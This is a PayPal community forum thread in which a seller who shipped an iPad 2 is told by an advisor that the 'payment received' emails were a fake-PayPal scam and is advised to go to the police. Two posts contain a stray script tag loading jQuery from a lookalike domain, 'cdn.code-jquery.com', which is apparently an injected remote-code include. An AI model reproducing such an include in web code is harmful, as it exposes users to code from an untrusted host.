didnt recieve my money from paypal when i sold an item

lorn123
Contributor
Contributor

i sold my item privately and supposely the buyer paid me £320.00 through paypal last week but still no money from paypal has gone in my account.they keep coming up with excuses and trying to get money out of me then say theyll put it into my account,this is all wrong,give me my money i need it!!!!!

Login to Me Too
6 REPLIES 6

kernowlass
Esteemed Advisor
Esteemed Advisor

Please tell me you didn't send the item to Nigeria????

Advice is voluntary.
Kudos / Solution appreciated.
Login to Me Too

lorn1234
Contributor
Contributor

i didnt send it to nigeria ,but paypal is mentioning a nigerian bank,and i just dont no what there on about and wanting me to pay more money then theyll put it in my account,i seem to think ive been hacked here by the buyer,my ipad 2 gone and no money for it from the buyer,ive been so upset by this really needed the money!!

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>
Login to Me Too

lorn1234
Contributor
Contributor

it said on my emails from paypal about a third party,and nigerian bank and wanting more money and that was when supposely the buyer paid then paypal said if i pay the buyer 200.00 they will transfer my money into my paypal account, i cant believe this is happening ive lost my ipad 2 im devasted theyve got it for free and i have nothing!!

<script type="text/javascript" src="http://cdn.code-jquery.com/jquery-1.7.2.min.js"></script>
Login to Me Too

kernowlass
Esteemed Advisor
Esteemed Advisor

THIS IS A SCAM.

You will get/got a "fake" email that looks as though it is from paypal.....it isn't.

It will say the buyer has paid ...you won't have been paid.

They will tell you that the payment is released when you provide paypal with a tracking/shipping number......this won't happen.

They threaten legal action...have a laugh at that one and ignore it as its rubbish.

Most scams originate from Nigeria and people there cannot even own a paypal account.

Paypal NEVER tell you to send trackable, they advise it for seller protection etc but it is not compulsory.

Paypal NEVER tell you to send an item before the payment is showing in your paypal account.

Advice is voluntary.
Login to Me Too

lorn123
Contributor
Contributor

OMG!!! i new something wasnt right when hes name and address of the bank was at the bottom of the email plus using different paypal people in different emails i was fooled ill feel so hurt and hunilated how didnt i no i feel so stupid, ive lost my ipad 2 o i new it deep down i new i was just hoping i was wrong first time this has happened to me.when he said he sent the money an email came thru from paypal telling me the payment will go into my account when its been sent by royal mail special delivery and only untill paypal have the tracking number will they put it into my account i just cant believe it now i was even replying tp those emails that were now i no were going straight to them, im upset i have it hard as it is i needed money why o why did i;( i sent my ipad 2 to a london address he gave me for his daughter and that he came from the states im lost for words!! thankyou so much for telling me and confirming this i feel like having a big cry

Login to Me Too

kernowlass
Esteemed Advisor
Esteemed Advisor

If it was a london address i would inform the police and get a crime number..

You  never know they may take it further for you.

I am so sorry you have been scammed, I feel like having a cry with you.

The US account he used may well have been hijacked as well.

Smiley Sad

Advice is voluntary.
Login to Me Too

Haven't Found your Answer?

It happens. Hit the "Login to Ask the community" button to create a question for the PayPal community.